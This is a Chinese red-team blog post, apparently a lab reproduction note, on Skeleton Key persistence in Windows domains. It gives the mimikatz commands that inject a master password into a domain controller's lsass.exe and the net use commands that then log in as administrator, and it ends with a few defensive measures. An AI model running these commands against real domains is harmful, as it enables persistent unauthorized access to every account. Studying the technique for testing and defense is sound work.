Skeleton Key（万能密码）对域内权限维持

大家好，这里是 渗透攻击红队 的第 39 篇文章，本公众号会记录一些我学习红队攻击的复现笔记（由浅到深），不出意外每天一更

Skeleton Key

使用 Skeleton Key（万能密码），可以对域内权限进行持久化操作。

使用 mimikatz 完成注入 Skeleon Key 的操作，将 Skeleton Key 注入域控制器的 lsass.exe 进程。

万能密码

实验环境

远程系统：

• 域名：god.org

域控制器：

• 主机名：OWA2010CN-God
• IP地址：192.168.3.21
• 用户名：administrator
• 密码：Admin12345

域成员服务器：

• 主机名：mary-PC
• IP地址：192.168.3.25
• 用户名：mary
• 密码：admin!@#45

Mimikatz 中使用 Skeleton Key

尝试以当前登录用户身份列出域控制器 C 盘共享目录中的文件：

dir \\192.168.3.21\c$

因为此时是一个普通的域用户身份，所以系统提示权限不足！

这个时候使用域管理员账号和密码进行连接：

net use \\192.168.3.21\ipc$ "Admin12345" /user:god\administrator

连接成功，这个时候就列出了域控制器 C 盘的共享目录。

之后在域控制器中以管理员权限打开 mimikatz，输入命令将 Skeleton Key 注入域控制器的 lsass.exe 进程：

# 提升权限
privilege::debug
# 注入 skeleton key
misc::skeleton

这个时候系统提示 Skeleton Key 已经注入成功，此时会在域内的所有账号中添加一个 Skeleton Key，其密码默认为：“mimikatz”。

接下来就可以了使用域内任意用户的身份配合 Skeleton Key 进行域内身份授权验证了。

在不使用域管理员原始密码的情况下，使用注入的 Skeleton Key，同样可以成功连接系统：

# 查看现有 ipc$
net use
# 将之前建立的 ipc$ 删除
net use \\192.168.3.21\ipc$ /del /y

输入命令，使用域管理员账号和 Skeleton Key 与域控制器建立 ipc$：

net use \\OWA2010CN-God\ipc$ "mimikatz" /user:god\administrator

建立成功后这样就可以列出域控制器的共享目录了！

Skeleton Key 防御措施

• 域管理员用户要设置强密码，确保恶意代码不会在域控制器中执行。
• 在所有域用户中启用双因子认证，例如智能卡认证。
• 启动应用程序白名单（例如 AppLocker），以限制 mimikatz 在域控制器中的运行。

PS：因为 Skeleton Key 是被注入到 lsass.exe 进程的，所以它只存在于内存中，如果域控制器重启，注入的 Skeleton Key 将会失效。